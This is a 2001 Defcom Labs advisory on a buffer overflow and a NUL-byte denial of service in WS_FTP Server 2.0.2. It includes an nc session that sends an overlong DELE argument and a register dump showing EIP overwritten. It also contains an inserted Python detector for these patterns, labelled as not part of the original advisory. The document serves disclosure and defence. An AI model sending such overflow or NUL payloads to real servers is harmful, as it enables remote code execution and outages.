def-2001-28 - WS_FTP server 2.0.2 Buffer Overflow and possible DOS

From: andreas junestam (andreas.junestamat_private)
Date: Thu Jul 26 2001 - 05:25:13 PDT


    ======================================================================
                      Defcom Labs Advisory def-2001-28
    
             WS_FTP server 2.0.2 Buffer Overflow and possible DOS
    
    Author: Andreas Junestam <andreasat_private>
    Co-Author: Janne Sarendal <janneat_private>
    Release Date: 2001-07-26
    ======================================================================
    ------------------------=[Brief Description]=-------------------------
    WS_FTP server 2.0.2 contains a buffer overflow which affects the
    following commands:
    * DELE
    * MDTM
    * MLST
    * MKD
    * RMD
    * RNFR
    * RNTO
    * SIZE
    * STAT
    * XMKD
    * XRMD
    This buffer overflow gives an attacker the ability to run code on
    the target with SYSTEM RIGHTS, because the server runs as a service
    by default. Note: this is only valid when logged in as an anonymous
    user, not as an ordinary one.
    
    The server also contains an easy-to-trigger DOS.
    
    ------------------------=[Affected Systems]=--------------------------
    - WS_FTP server 2.0.2; other versions haven't been tested
    
    ----------------------=[Detailed Description]=------------------------
    * Command Buffer Overrun
      All the commands listed above seem to use the same parsing code,
      which suffers from a buffer overflow. By sending a command with an
      argument longer than 478 bytes (474 bytes of buffer plus a new
      return address), the buffer overflows and EIP is overwritten. A
      proof-of-concept exploit is attached to the advisory; it works
      against WS_FTP server 2.0.2 running on WIN2K (Professional and
      Server, any SP).
    
      C:\tools\web>nc -nvv 127.0.0.1 21
      (UNKNOWN) [127.0.0.1] 21 (?) open
      220-helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
      220-Tue Jun 19 14:00:21 2001
      220-30 days remaining on evaluation.
      220 helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
      user ftp
      331 Password required
      pass ftp
      230 user logged in
      DELE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    
      Access violation - code c0000005 (first chance)
      eax=000000ea ebx=0067c278 ecx=000000ea edx=00000002 esi=0067c278 edi=77fca3e0
      eip=41414141 esp=0104df88 ebp=41414141 iopl=0         nv up ei pl zr na po nc
      cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246
    
    * Possible DOS
      By sending a couple of NULL (0x00) characters, the WS_FTP Server
      will spike to 100% CPU.
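    As an added example (not part of the advisory or of the attached
    ws_ftp.pl), the two checks a defender would run over a captured
    client-to-server FTP control channel: an argument to one of the
    listed commands that exceeds the 474-byte buffer, and NUL bytes in
    the command stream. The anonymous user names and the sample session
    are assumptions constructed for the example.

```python
from __future__ import annotations
from dataclasses import dataclass

# Commands the advisory lists as sharing the overflowable parsing code.
AFFECTED_COMMANDS = {"DELE", "MDTM", "MLST", "MKD", "RMD", "RNFR",
                     "RNTO", "SIZE", "STAT", "XMKD", "XRMD"}
BUFFER_SIZE = 474                        # bytes before the saved return address
ANONYMOUS_USERS = {"ftp", "anonymous"}   # assumption: typical anonymous logins


@dataclass
class Finding:
    line_no: int
    kind: str        # "overflow" or "nul_dos"
    command: str
    anonymous: bool  # advisory: SYSTEM-level impact only for anonymous logins
    detail: str


def inspect_session(raw: bytes) -> list[Finding]:
    """Scan captured client->server FTP commands (CRLF separated) for the
    two patterns in the advisory; the USER command is tracked so that each
    finding records whether the session was anonymous."""
    findings: list[Finding] = []
    user = ""
    for line_no, line in enumerate(raw.split(b"\r\n"), start=1):
        if not line:
            continue
        nul_count = line.count(b"\x00")
        if nul_count:
            findings.append(Finding(line_no, "nul_dos", "", user in ANONYMOUS_USERS,
                                    f"{nul_count} NUL byte(s) in command line"))
            line = line.replace(b"\x00", b"")
        verb, _, arg = line.partition(b" ")
        verb = verb.decode("ascii", "replace").upper()
        if verb == "USER":
            user = arg.decode("ascii", "replace").strip().lower()
        elif verb in AFFECTED_COMMANDS and len(arg) > BUFFER_SIZE:
            findings.append(Finding(line_no, "overflow", verb, user in ANONYMOUS_USERS,
                                    f"{len(arg)}-byte argument exceeds {BUFFER_SIZE}-byte buffer"))
    return findings


# Constructed sample session modelled on the advisory's transcript.
SAMPLE_SESSION = (b"USER ftp\r\nPASS ftp\r\n"
                  b"DELE readme.txt\r\n"
                  b"DELE " + b"A" * 500 + b"\r\n"
                  + b"\x00\x00\r\n")

if __name__ == "__main__":
    for f in inspect_session(SAMPLE_SESSION):
        print(f"line {f.line_no}: {f.kind} {f.command} anonymous={f.anonymous} ({f.detail})")
```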
    
    ---------------------------=[Workaround]=-----------------------------
    
    Download the new version from:
    http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html
    
    -----------------------------=[Exploit]=------------------------------
    See attached file, ws_ftp.pl
    
    -------------------------=[Vendor Response]=--------------------------
    This issue was brought to the vendor's attention on the 18th of
    June, 2001. A patch has been released.
    
    ======================================================================
                This release was brought to you by Defcom Labs
    
                  labsat_private             www.defcom.com
    ======================================================================